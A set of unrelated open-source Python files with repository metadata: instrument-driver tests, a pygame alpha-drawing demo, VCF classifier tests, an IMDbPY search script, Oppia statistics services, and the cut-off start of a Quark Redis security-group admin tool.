self._send_port_agent_packet(driver, Prompt.START1 + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.START2)
self._send_port_agent_packet(driver, Prompt.START2 + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.SAMPLE)
self._send_port_agent_packet(driver, Prompt.SAMPLE_FINISHED + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
def test_cal_sequence(self):
"""
Test the MCU ACAL9 sequence handling
"""
driver = self.test_connect()
driver._protocol._protocol_fsm.on_event(ProtocolEvent.START1)
self._send_port_agent_packet(driver, Prompt.START1 + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.START2)
self._send_port_agent_packet(driver, Prompt.START2 + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.CALIBRATE)
self._send_port_agent_packet(driver, Prompt.CAL_FINISHED + NEWLINE)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
def test_protocol_filter_capabilities(self):
"""
This tests driver filter_capabilities.
Iterate through available capabilities, and verify that they can pass successfully through the filter.
Test silly made up capabilities to verify they are blocked by filter.
"""
protocol = Protocol(Prompt, NEWLINE, Mock())
driver_capabilities = Capability.list()
test_capabilities = Capability.list()
# Add a bogus capability that will be filtered out.
test_capabilities.append("BOGUS_CAPABILITY")
# Verify "BOGUS_CAPABILITY was filtered out
self.assertEquals(sorted(driver_capabilities),
sorted(protocol._filter_capabilities(test_capabilities)))
def test_driver_schema(self):
"""
get the driver schema and verify it is configured properly
"""
driver = InstrumentDriver(self._got_data_event_callback)
self.assert_driver_schema(driver, self._driver_parameters, self._driver_capabilities)
def test_regen(self):
"""
Verify we can start/stop the regen states
"""
driver = self.test_connect()
driver._protocol._protocol_fsm.on_event(ProtocolEvent.NAFREG)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
self._send_port_agent_packet(driver, Prompt.NAFREG_FINISHED + NEWLINE)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.IONREG)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
self._send_port_agent_packet(driver, Prompt.IONREG_FINISHED + NEWLINE)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
def test_regen_stop(self):
"""
Verify we can abort the regen states
"""
driver = self.test_connect()
driver._protocol._protocol_fsm.on_event(ProtocolEvent.NAFREG)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.IONREG)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
###############################################################################
# INTEGRATION TESTS #
# Integration test test the direct driver / instrument interaction #
# but making direct calls via zeromq. #
# - Common Integration tests test the driver through the instrument agent #
# and common for all drivers (minimum requirement for ION ingestion) #
###############################################################################
@attr('INT', group='mi')
class DriverIntegrationTest(InstrumentDriverIntegrationTestCase, DriverTestMixinSub):
def setUp(self):
InstrumentDriverIntegrationTestCase.setUp(self)
def test_connect(self):
"""
Stand up the driver, transition to COMMAND
"""
self.assert_initialize_driver()
def test_get(self):
self.assert_initialize_driver()
for param in self._driver_parameters:
self.assert_get(param, self._driver_parameters[param][self.VALUE])
def test_set_and_bad_command(self):
"""
Test setting of parameters, including exceptions for bad parameters/values.
Test exception on receipt of bad command.
Combined due to long startup time.
"""
self.assert_initialize_driver()
constraints = ParameterConstraint.dict()
parameters = Parameter.dict()
for key in constraints:
_type, minimum, maximum = constraints[key]
param = parameters[key]
if not self._driver_parameters[param][self.READONLY]:
self.assert_set(param, maximum)
self.assert_set_exception(param, maximum + 1)
else:
self.assert_set_exception(param, maximum)
self.assert_set_exception('BOGUS', 'CHEESE')
self.assert_driver_command_exception('BAD_COMMAND', exception_class=InstrumentCommandException)
def test_start1_and_data_particle(self):
"""
Test sending the START1 command and data particle generation
"""
self.assert_initialize_driver()
self.assert_driver_command(Capability.START1)
self.assert_state_change(ProtocolState.WAITING_TURBO, 60)
self.assert_async_particle_generation(DataParticleType.MCU_STATUS, self.assert_mcu_status_particle, timeout=60)
self.assert_driver_command(Capability.STANDBY)
self.assert_driver_command(Capability.POWEROFF)
def test_regen(self):
"""
Test the ion chamber and nafion regen commands
"""
self.assert_initialize_driver()
self.assert_driver_command(Capability.IONREG)
self.assert_state_change(ProtocolState.REGEN, 5)
self.assert_driver_command(Capability.STANDBY)
self.assert_state_change(ProtocolState.COMMAND, 20)
self.assert_driver_command(Capability.NAFREG)
self.assert_state_change(ProtocolState.REGEN, 5)
self.assert_driver_command(Capability.STANDBY)
self.assert_state_change(ProtocolState.COMMAND, 20)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for doing final testing of ion #
# integration. The generally aren't used for instrument debugging and should #
# be tackled after all unit and integration tests are complete #
###############################################################################
@attr('QUAL', group='mi')
class DriverQualificationTest(InstrumentDriverQualificationTestCase, DriverTestMixinSub):
def setUp(self):
InstrumentDriverQualificationTestCase.setUp(self)
def test_data_particle(self):
"""
Test data particle generation
"""
self.assert_enter_command_mode()
self.assert_particle_async(DataParticleType.MCU_STATUS, self.assert_mcu_status_particle, timeout=90)
def test_direct_access_telnet_mode(self):
"""
This test manually tests that the Instrument Driver properly supports
direct access to the physical instrument. (telnet mode)
"""
self.assert_direct_access_start_telnet(session_timeout=180)
self.assertTrue(self.tcp_client)
self.tcp_client.send_data(InstrumentCommand.BEAT + NEWLINE)
self.assertTrue(self.tcp_client.expect(Prompt.BEAT))
self.tcp_client.send_data(InstrumentCommand.START1 + NEWLINE)
self.assertTrue(self.tcp_client.expect(Prompt.OK))
self.assertTrue(self.tcp_client.expect(Prompt.START1, max_retries=90))
self.tcp_client.send_data(InstrumentCommand.STANDBY + NEWLINE)
self.assertTrue(self.tcp_client.expect(Prompt.OK))
self.assert_direct_access_stop_telnet()
def test_discover(self):
"""
Overridden, this driver does not have autosample
"""
# Verify the agent is in command mode
self.assert_enter_command_mode()
# Now reset and try to discover. This will stop the driver which holds the current
# instrument state.
self.assert_reset()
self.assert_discover(ResourceAgentState.COMMAND)
def test_reset(self):
"""
Verify the agent can be reset
Overridden, this driver does not have autosample.
"""
self.assert_enter_command_mode()
self.assert_reset()
self.assert_enter_command_mode()
self.assert_direct_access_start_telnet(session_timeout=180)
self.assert_state_change(ResourceAgentState.DIRECT_ACCESS, DriverProtocolState.DIRECT_ACCESS, 30)
self.assert_reset()
def test_get_capabilities(self):
"""
Verify that the correct capabilities are returned from get_capabilities
at various driver/agent states.
We will only test command, direct_access and unknown, as we cannot reach all states with just the
MCU driver.
"""
self.assert_enter_command_mode()
##################
# Command Mode
##################
capabilities = {
AgentCapabilityType.AGENT_COMMAND: self._common_agent_commands(ResourceAgentState.COMMAND),
AgentCapabilityType.AGENT_PARAMETER: self._common_agent_parameters(),
AgentCapabilityType.RESOURCE_COMMAND: [
ProtocolEvent.START1,
ProtocolEvent.NAFREG,
ProtocolEvent.IONREG,
ProtocolEvent.POWEROFF,
],
AgentCapabilityType.RESOURCE_INTERFACE: None,
AgentCapabilityType.RESOURCE_PARAMETER: self._driver_parameters.keys()
}
self.assert_capabilities(capabilities)
##################
# DA Mode
##################
capabilities[AgentCapabilityType.AGENT_COMMAND] = self._common_agent_commands(ResourceAgentState.DIRECT_ACCESS)
capabilities[AgentCapabilityType.RESOURCE_COMMAND] = self._common_da_resource_commands()
self.assert_direct_access_start_telnet()
self.assert_capabilities(capabilities)
self.assert_direct_access_stop_telnet()
#######################
# Uninitialized Mode
#######################
capabilities[AgentCapabilityType.AGENT_COMMAND] = self._common_agent_commands(ResourceAgentState.UNINITIALIZED)
capabilities[AgentCapabilityType.RESOURCE_COMMAND] = []
capabilities[AgentCapabilityType.RESOURCE_INTERFACE] = []
capabilities[AgentCapabilityType.RESOURCE_PARAMETER] = []
self.assert_reset()
self.assert_capabilities(capabilities)
def test_direct_access_telnet_closed(self):
"""
Test that we can properly handle the situation when a direct access
session is launched, the telnet is closed, then direct access is stopped.
OVERRIDDEN to extend timeout period to return to command.
"""
self.assert_enter_command_mode()
self.assert_direct_access_start_telnet(timeout=600)
self.assertTrue(self.tcp_client)
self.tcp_client.disconnect()
self.assert_state_change(ResourceAgentState.COMMAND, DriverProtocolState.COMMAND, 90)
|
{
"content_hash": "1d0091ec168597051a34e20f61854853",
"timestamp": "",
"source": "github",
"line_count": 743,
"max_line_length": 119,
"avg_line_length": 48.799461641991925,
"alnum_prop": 0.6083622924595952,
"repo_name": "petercable/mi-instrument",
"id": "cc55daa93d2142f9969ff69b0d743f1f1e27ae33",
"size": "36258",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mi/instrument/harvard/massp/mcu/test/test_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "6415660"
}
],
"symlink_target": ""
}
|
"""Drawing with alpha values."""
####
import pygame
import os
####
def load_pic(name, path="data"):
pic = pygame.image.load(os.path.join(path, name))
if pic.get_alpha():
return pic.convert_alpha()
else:
return pic.convert()
####
def check(x, minval=0, maxval=255):
return min(maxval, max(minval, x))
####
def offset(len1, len2):
""" For picture centering"""
return max(0, (len1 - len2) // 2)
####
class PeepDemo(object):
def __init__(self, conf):
pygame.init()
self.width = conf['width']
self.height = conf['height']
self.fps = conf['fps']
self.screen = pygame.display.set_mode((self.width, self.height), pygame.DOUBLEBUF)
self.clock = pygame.time.Clock()
pygame.display.set_caption("Move Mouse and Scroll Mouse Wheel")
self.pic = load_pic(conf['pic'])
self.background = pygame.Surface(self.screen.get_size()).convert()
self.background.fill(conf['backcol'])
self.alpha_surface = pygame.Surface(self.screen.get_size(), flags=pygame.SRCALPHA)
wo = offset(self.width, self.pic.get_width())
ho = offset(self.height, self.pic.get_height())
self.pic_offset = wo, ho
# init stuff for circles with alpha value
self.center = self.width // 2, self.height // 2
self.max_radius = min(self.width, self.height)
self.hole_count = conf['holes']
self.calc_centers(self.center, self.center, self.hole_count)
self.calc_rad_alphas(self.max_radius, self.hole_count)
def calc_rad_alphas(self, radius, n):
"""Calculate linear radius and alpha values."""
assert 0 < n < 256, "Invalid number of holes!"
rad_step = radius // n
alpha_step = 256 // n
self.rad_alphas = [(radius - i * rad_step, 255 - i*alpha_step) for i in range(n)]
def calc_centers(self, center, pos, holes):
"""Calculate center points from center (of window) to mouse position."""
cx, cy = center
mx, my = pos
vx, vy = mx - cx, my - cy
xs = vx // holes
ys = vy // holes
self.centers = [(cx + xs*i, cy + ys*i) for i in range(holes)]
def run(self):
"""Mainloop"""
mainloop = True
while mainloop:
self.flip()
for event in pygame.event.get():
if event.type == pygame.QUIT:
mainloop = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
mainloop = False
elif event.type == pygame.MOUSEMOTION:
self.calc_centers(self.center, pygame.mouse.get_pos(),
self.hole_count)
elif event.type == pygame.MOUSEBUTTONDOWN:
# check mouse wheel
if event.button in (4, 5):
self.hole_count = check(self.hole_count+ [-1, 1][event.button-4],
2, 64)
self.calc_rad_alphas(self.max_radius, self.hole_count)
self.calc_centers(self.center, pygame.mouse.get_pos(),
self.hole_count)
self.show()
pygame.quit()
def show(self):
"""Draw all."""
# picture on screen
self.screen.blit(self.pic, self.pic_offset)
# circles on alpha surface
for (r, a), c in zip(self.rad_alphas, self.centers):
pygame.draw.circle(self.alpha_surface, (0, 0, 0, a), c, r)
# alpha surface on screen
self.screen.blit(self.alpha_surface, (0, 0))
# erase alpha surface for new circles
self.alpha_surface.fill((0, 0, 0))
def flip(self):
"""Show drawing and erase."""
pygame.display.flip()
self.screen.blit(self.background, (0, 0))
self.clock.tick(self.fps)
####
CONFIG = {'width': 800,
'height': 600,
'backcol': (255, 0, 0),
'fps': 100,
'fontsize': 18,
'pic': 'ente.jpg',
'holes': 7}
####
if __name__ == "__main__":
PeepDemo(CONFIG).run()
|
{
"content_hash": "a2d5941bbf3d06463cc9ac0c5f4b793c",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 90,
"avg_line_length": 29.375,
"alnum_prop": 0.5295508274231678,
"repo_name": "yipyip/Pygame-Examples",
"id": "de8971f17fadf454091967f8fab9a75e671e287b",
"size": "4255",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "peep.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "45622"
}
],
"symlink_target": ""
}
|
import os
import pytest
from VCF.VCFfilter.MLclassifier import MLclassifier
def test_train_snps(datadir):
"""
Train the model for SNPs
"""
ML_obj = MLclassifier()
outfile = ML_obj.train(outprefix="{0}/outdir/fitted_logreg_snps".format(datadir),
tp_annotations="{0}/TP_annotations_snps.chr20.tsv".format(datadir),
fp_annotations="{0}/FP_annotations_snps.chr20.tsv".format(datadir))
assert os.path.isfile(outfile) is True
def test_train_snps_gz(datadir):
"""
Train the model for SNPs using 2 gzipped annotation files
"""
ML_obj = MLclassifier()
outfile = ML_obj.train(outprefix="{0}/outdir/fitted_logreg_snps".format(datadir),
tp_annotations="{0}/TP_annotations_snps.chr20.tsv.gz".format(datadir),
fp_annotations="{0}/FP_annotations_snps.chr20.tsv.gz".format(datadir))
def test_train_indels(datadir):
"""
Train the model for INDELs
"""
ML_obj = MLclassifier()
outfile = ML_obj.train(outprefix="{0}/outdir/fitted_logreg_indels".format(datadir),
tp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
fp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir))
assert os.path.isfile(outfile) is True
def test_apply_model(clean_tmp, datadir):
ML_obj = MLclassifier(fitted_model="{0}/outdir/fitted_logreg_snps.sav".format(datadir))
outfile = ML_obj.predict(outprefix="{0}/outdir/predictions".format(datadir),
annotation_f="{0}/TP_annotations_snps.chr20.tsv".format(datadir),
cutoff=0.95)
assert os.path.isfile(outfile) is True
def test_rfe(datadir, clean_tmp):
ML_obj = MLclassifier()
select_feats_report = ML_obj.rfe(tp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
fp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
n_features=5,
outreport="{0}/outdir/out_rfe.txt".format(datadir))
assert os.path.isfile(select_feats_report) is True
|
{
"content_hash": "92ac744baf13c95ef63c531656c7b2e6",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 106,
"avg_line_length": 36.3728813559322,
"alnum_prop": 0.6346691519105312,
"repo_name": "igsr/igsr_analysis",
"id": "b9ed400a9cde0dad246b4468319eb8db4bd9a471",
"size": "2146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_MLclassifier.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3784"
},
{
"name": "Jupyter Notebook",
"bytes": "1784167"
},
{
"name": "Nextflow",
"bytes": "116144"
},
{
"name": "Perl",
"bytes": "280174"
},
{
"name": "Python",
"bytes": "532139"
},
{
"name": "R",
"bytes": "882"
}
],
"symlink_target": ""
}
|
"""
get_keyword.py
Usage: get_keyword "keyword"
search for movies tagged with the given keyword and print the results.
"""
import sys
# Import the IMDbPY package.
try:
import imdb
except ImportError:
print 'You bad boy! You need to install the IMDbPY package!'
sys.exit(1)
if len(sys.argv) != 2:
print 'Only one argument is required:'
print ' %s "keyword"' % sys.argv[0]
sys.exit(2)
name = sys.argv[1]
i = imdb.IMDb()
in_encoding = sys.stdin.encoding or sys.getdefaultencoding()
out_encoding = sys.stdout.encoding or sys.getdefaultencoding()
name = unicode(name, in_encoding, 'replace')
try:
# Do the search, and get the results (a list of movies).
results = i.get_keyword(name, results=20)
except imdb.IMDbError, e:
print "Probably you're not connected to Internet. Complete error report:"
print e
sys.exit(3)
# Print the results.
print ' %s result%s for "%s":' % (len(results),
('', 's')[len(results) != 1],
name.encode(out_encoding, 'replace'))
print ' : movie title'
# Print the long imdb title for every movie.
for idx, movie in enumerate(results):
outp = u'%d: %s' % (idx+1, movie['long imdb title'])
print outp.encode(out_encoding, 'replace')
|
{
"content_hash": "d2ec0ba0a2696f44011b29902d2e4d43",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 78,
"avg_line_length": 24.903846153846153,
"alnum_prop": 0.633976833976834,
"repo_name": "andurilhuang/Movie_Income_Prediction",
"id": "becbf03e44d8776148dbfed15366e9dc32eef85a",
"size": "1317",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "paper/historycode/IMDbPY-5.1.1/bin/get_keyword.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7150"
},
{
"name": "Jupyter Notebook",
"bytes": "1286755"
},
{
"name": "Python",
"bytes": "901375"
},
{
"name": "Shell",
"bytes": "5368"
}
],
"symlink_target": ""
}
|
"""Services for exploration-related statistics."""
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import stats_domain
from core.domain import stats_jobs_continuous
from core.platform import models
(stats_models,) = models.Registry.import_models([models.NAMES.statistics])
IMPROVE_TYPE_DEFAULT = 'default'
IMPROVE_TYPE_INCOMPLETE = 'incomplete'
# TODO(bhenning): Everything is handler name submit; therefore, it is
# pointless and should be removed.
_OLD_SUBMIT_HANDLER_NAME = 'submit'
def get_top_unresolved_answers_for_default_rule(exploration_id, state_name):
return {
answer: count for (answer, count) in
stats_domain.StateRuleAnswerLog.get(
exploration_id, state_name, exp_domain.DEFAULT_RULESPEC_STR
).get_top_answers(3)
}
def get_exps_unresolved_answers_for_default_rule(exp_ids):
"""Gets unresolved answers per exploration for default rule across all
states for explorations with ids in exp_ids. The value of total count should
match the sum of values of indiviual counts for each unresolved answer.
TODO(526avijitgupta): Note that this method currently returns the data only
for the DEFAULT rule. This should ideally handle all types of unresolved
answers.
Returns a dict of the following format:
{
'exp_id_1': {
'count': 7 (number of unresolved answers for this exploration),
'unresolved_answers': (list of unresolved answers sorted by count)
[
{'count': 4, 'value': 'answer_1', 'state': 'Introduction'},
{'count': 2, 'value': 'answer_2', 'state': 'Introduction'},
{'count': 1, 'value': 'answer_3', 'state': 'End'}
]
},
'exp_id_2': {
'count': 13,
'unresolved_answers':
[
{'count': 8, 'value': 'answer_5', 'state': 'Introduction'},
{'count': 3, 'value': 'answer_4', 'state': 'Quest'},
{'count': 1, 'value': 'answer_6', 'state': 'End'}
{'count': 1, 'value': 'answer_8', 'state': 'End'}
]
}
}
"""
def _get_explorations_states_tuples_by_ids(exp_ids):
"""Returns a list of all (exp_id, state_name) tuples for the given
exp_ids.
E.g. - [
('eid1', 'Introduction'),
('eid1', 'End'),
('eid2', 'Introduction'),
('eid3', 'Introduction')
]
when exp_ids = ['eid1', 'eid2', 'eid3'].
"""
explorations = (
exp_services.get_multiple_explorations_by_id(exp_ids, strict=False))
return [
(exploration.id, state_name)
for exploration in explorations.values()
for state_name in exploration.states
]
explorations_states_tuples = _get_explorations_states_tuples_by_ids(exp_ids)
exploration_states_answers_list = get_top_state_rule_answers_multi(
explorations_states_tuples, [exp_domain.DEFAULT_RULESPEC_STR])
exps_answers_mapping = {}
for ind, statewise_answers in enumerate(exploration_states_answers_list):
exp_id = explorations_states_tuples[ind][0]
if exp_id not in exps_answers_mapping:
exps_answers_mapping[exp_id] = {
'count': 0,
'unresolved_answers': []
}
for answer in statewise_answers:
exps_answers_mapping[exp_id]['count'] += answer['count']
answer['state'] = explorations_states_tuples[ind][1]
exps_answers_mapping[exp_id]['unresolved_answers'].extend(
statewise_answers)
for exp_id in exps_answers_mapping:
exps_answers_mapping[exp_id]['unresolved_answers'] = (sorted(
exps_answers_mapping[exp_id]['unresolved_answers'],
key=lambda a: a['count'],
reverse=True))
return exps_answers_mapping
def get_state_rules_stats(exploration_id, state_name):
"""Gets statistics for the answer groups and rules of this state.
Returns:
A dict, keyed by the string '{HANDLER_NAME}.{RULE_STR}', whose
values are the corresponding stats_domain.StateRuleAnswerLog
instances.
"""
exploration = exp_services.get_exploration_by_id(exploration_id)
state = exploration.states[state_name]
rule_keys = []
for group in state.interaction.answer_groups:
for rule in group.rule_specs:
rule_keys.append((
_OLD_SUBMIT_HANDLER_NAME, rule.stringify_classified_rule()))
if state.interaction.default_outcome:
rule_keys.append((
_OLD_SUBMIT_HANDLER_NAME, exp_domain.DEFAULT_RULESPEC_STR))
answer_logs = stats_domain.StateRuleAnswerLog.get_multi(
exploration_id, [{
'state_name': state_name,
'rule_str': rule_key[1]
} for rule_key in rule_keys])
results = {}
for ind, answer_log in enumerate(answer_logs):
results['.'.join(rule_keys[ind])] = {
'answers': answer_log.get_top_answers(5),
'rule_hits': answer_log.total_answer_count
}
return results
def get_top_state_rule_answers(exploration_id, state_name, rule_str_list):
"""Returns a list of top answers (by submission frequency) submitted to the
given state in the given exploration which were mapped to any of the rules
listed in 'rule_str_list'. All answers submitted to the specified state and
match the rule spec strings in rule_str_list are returned.
"""
return get_top_state_rule_answers_multi(
[(exploration_id, state_name)], rule_str_list)[0]
def get_top_state_rule_answers_multi(exploration_state_list, rule_str_list):
"""Returns a list of top answers (by submission frequency) submitted to the
given explorations and states which were mapped to any of the rules listed
in 'rule_str_list' for each exploration ID and state name tuple in
exploration_state_list.
For each exploration ID and state, all answers submitted that match any of
the rule spec strings in rule_str_list are returned.
"""
answer_log_list = (
stats_domain.StateRuleAnswerLog.get_multi_by_multi_explorations(
exploration_state_list, rule_str_list))
return [[
{
'value': top_answer[0],
'count': top_answer[1]
}
for top_answer in answer_log.get_all_top_answers()
] for answer_log in answer_log_list]
def get_state_improvements(exploration_id, exploration_version):
"""Returns a list of dicts, each representing a suggestion for improvement
to a particular state.
"""
ranked_states = []
exploration = exp_services.get_exploration_by_id(exploration_id)
state_names = exploration.states.keys()
default_rule_answer_logs = stats_domain.StateRuleAnswerLog.get_multi(
exploration_id, [{
'state_name': state_name,
'rule_str': exp_domain.DEFAULT_RULESPEC_STR
} for state_name in state_names])
statistics = stats_jobs_continuous.StatisticsAggregator.get_statistics(
exploration_id, exploration_version)
state_hit_counts = statistics['state_hit_counts']
for ind, state_name in enumerate(state_names):
total_entry_count = 0
no_answer_submitted_count = 0
if state_name in state_hit_counts:
total_entry_count = (
state_hit_counts[state_name]['total_entry_count'])
no_answer_submitted_count = state_hit_counts[state_name].get(
'no_answer_count', 0)
if total_entry_count == 0:
continue
threshold = 0.2 * total_entry_count
default_rule_answer_log = default_rule_answer_logs[ind]
default_count = default_rule_answer_log.total_answer_count
eligible_flags = []
state = exploration.states[state_name]
if (default_count > threshold and
state.interaction.default_outcome is not None and
state.interaction.default_outcome.dest == state_name):
eligible_flags.append({
'rank': default_count,
'improve_type': IMPROVE_TYPE_DEFAULT})
if no_answer_submitted_count > threshold:
eligible_flags.append({
'rank': no_answer_submitted_count,
'improve_type': IMPROVE_TYPE_INCOMPLETE})
if eligible_flags:
eligible_flags = sorted(
eligible_flags, key=lambda flag: flag['rank'], reverse=True)
ranked_states.append({
'rank': eligible_flags[0]['rank'],
'state_name': state_name,
'type': eligible_flags[0]['improve_type'],
})
return sorted([
ranked_state for ranked_state in ranked_states
if ranked_state['rank'] != 0
], key=lambda x: -x['rank'])
def get_versions_for_exploration_stats(exploration_id):
"""Returns list of versions for this exploration."""
return stats_models.ExplorationAnnotationsModel.get_versions(
exploration_id)
def get_exploration_stats(exploration_id, exploration_version):
"""Returns a dict with state statistics for the given exploration id.
Note that exploration_version should be a string.
"""
exploration = exp_services.get_exploration_by_id(exploration_id)
exp_stats = stats_jobs_continuous.StatisticsAggregator.get_statistics(
exploration_id, exploration_version)
last_updated = exp_stats['last_updated']
state_hit_counts = exp_stats['state_hit_counts']
return {
'improvements': get_state_improvements(
exploration_id, exploration_version),
'last_updated': last_updated,
'num_completions': exp_stats['complete_exploration_count'],
'num_starts': exp_stats['start_exploration_count'],
'state_stats': {
state_name: {
'name': state_name,
'firstEntryCount': (
state_hit_counts[state_name]['first_entry_count']
if state_name in state_hit_counts else 0),
'totalEntryCount': (
state_hit_counts[state_name]['total_entry_count']
if state_name in state_hit_counts else 0),
} for state_name in exploration.states
},
}
|
{
"content_hash": "f5e2afbd4ac5874e36532bd6daa9e53a",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 80,
"avg_line_length": 38.220588235294116,
"alnum_prop": 0.6168718737976144,
"repo_name": "jestapinski/oppia",
"id": "e893919214081d2d31f9e443990c2e4d73edc4fb",
"size": "11019",
"binary": false,
"copies": "6",
"ref": "refs/heads/develop",
"path": "core/domain/stats_services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "567034"
},
{
"name": "HTML",
"bytes": "813759"
},
{
"name": "JavaScript",
"bytes": "2463873"
},
{
"name": "Python",
"bytes": "2892341"
},
{
"name": "Shell",
"bytes": "46684"
}
],
"symlink_target": ""
}
|
all__ = ['pnexpose']
from pnexpose import *
|
{
"content_hash": "7e56b6e6a128d2045265c8ad85b5f1ad",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 22,
"avg_line_length": 22,
"alnum_prop": 0.6590909090909091,
"repo_name": "divious1/pnexpose",
"id": "18ba0de1f4a25ef2ad16c19190bd0cb8902a4e7c",
"size": "44",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "20916"
}
],
"symlink_target": ""
}
|
"""Quark Redis Security Groups CLI tool.
Usage: redis_sg_tool [-h] [--config-file=PATH] [--retries=<retries>]
[--retry-delay=<delay>] <command> [--yarly]
Options:
-h --help Show this screen.
--version Show version.
--config-file=PATH Use a different config file path
--retries=<retries> Number of times to re-attempt some operations
--retry-delay=<delay> Amount of time to wait between retries
Available commands are:
redis_sg_tool test-connection
redis_sg_tool vifs-in-redis
redis_sg_tool num-groups
redis_sg_tool ports-with-groups
redis_sg_tool purge-orphans [--yarly]
redis_sg_tool write-groups [--yarly]
redis_sg_tool -h | --help
redis_sg_tool --version
"""
import sys
import time
import docopt
import netaddr
from neutron.common import config
import neutron.context
from oslo_config import cfg
from quark.cache import security_groups_client as sg_client
from quark.db import api as db_api
from quark import exceptions as q_exc
VERSION = 0.1
RETRIES = 5
RETRY_DELAY = 1
class QuarkRedisTool(object):
def __init__(self, arguments):
self._args = arguments
self._retries = RETRIES
self._retry_delay = RETRY_DELAY
if self._args.get("--retries"):
self._retries = int(self._args["--retries"])
if self._args.get("--retry-delay"):
self._retry_delay = int(self._args["--retry-delay"])
config_args = []
if self._args.get("--config-file"):
config_args.append("--config-file=%s" %
self._args.pop("--config-file"))
self._dryrun = not self._args.get("--yarly")
config.init(config_args)
if not cfg.CONF.config_file:
sys.exit(_("ERROR: Unable to find configuration file via the "
"default search paths (~/.neutron/, ~/, /etc/neutron/, "
"/etc/) and the '--config-file' option!"))
def dispatch(self):
command = self._args.get("<command>")
if command == "test-connection":
self.test_connection()
elif command == "vifs-in-redis":
self.vif_count()
elif command == "num-groups":
self.num_groups()
elif command == "ports-with-groups":
self.ports_with_groups()
elif command == "purge-orphans":
self.purge_orphans(self._dryrun)
elif command == "write-groups":
self.write_groups(self._dryrun)
else:
print("Redis security groups tool. Re-run with -h/--help for "
"options")
def _get_connection(self, giveup=True):
client = sg_client.SecurityGroupsClient()
try:
if client.ping():
return client
except Exception as e:
print(e)
if giveup:
print("Giving up...")
sys.exit(1)
def test_connection(self):
client = self._get_connection()
if client:
print("Connected Successfully")
return True
else:
print("Could not connect to Redis")
return False
def vif_count(self):
client = self._get_connection()
print(len(client.vif_keys(field=sg_client.SECURITY_GROUP_HASH_ATTR)))
def num_groups(self):
ctx = neutron.context.get_admin_context()
print(db_api.security_group_count(ctx))
def ports_with_groups(self):
ctx = neutron.context.get_admin_context()
print(db_api.ports_with_security_groups_count(ctx))
def purge_orphans(self, dryrun=False):
client = self._get_connection()
ctx = neutron.context.get_admin_context()
ports_with_groups = db_api.ports_with_security_groups_find(ctx).all()
if dryrun:
print()
print("Purging orphans in dry run mode. Existing rules in Redis "
"will be checked against those in the database. If any "
"are found in Redis but lack matching database rules, "
"they'll be deleted from the database.\n\nTo actually "
"apply the groups, re-run with the --yarly flag.")
print()
print("Found %s ports with security groups" %
len(ports_with_groups))
# Pre-spin the list of orphans
vifs = {}
for vif in client.vif_keys():
vifs[vif] = False
if dryrun:
print("Found %d VIFs in Redis" % len(vifs))
# Pop off the ones we find in the database
for port in ports_with_groups:
vif_key = client.vif_key(port["device_id"], port["mac_address"])
vifs.pop(vif_key, None)
if dryrun:
print("Found %d orphaned VIF rule sets" % len(vifs))
print('=' * 80)
for orphan in vifs.keys():
if dryrun:
print("VIF %s is orphaned" % orphan)
else:
for retry in xrange(self._retries):
try:
client.delete_key(orphan)
break
except q_exc.RedisConnectionFailure:
time.sleep(self._retry_delay)
client = self._get_connection(giveup=False)
if dryrun:
print('=' * 80)
print()
print("Re-run with --yarly to apply changes")
print("Done!")
def write_groups(self, dryrun=False):
client = self._get_connection()
ctx = neutron.context.get_admin_context()
ports_with_groups = db_api.ports_with_security_groups_find(ctx).all()
if dryrun:
print()
print("Writing groups in dry run mode. Existing rules in Redis "
"will be checked against those in the database, with a "
"running report generated of all those that will be "
"overwritten.\n\nTo actually apply the groups, re-run "
"with the --yarly flag.")
print()
print("Found %s ports with security groups" %
len(ports_with_groups))
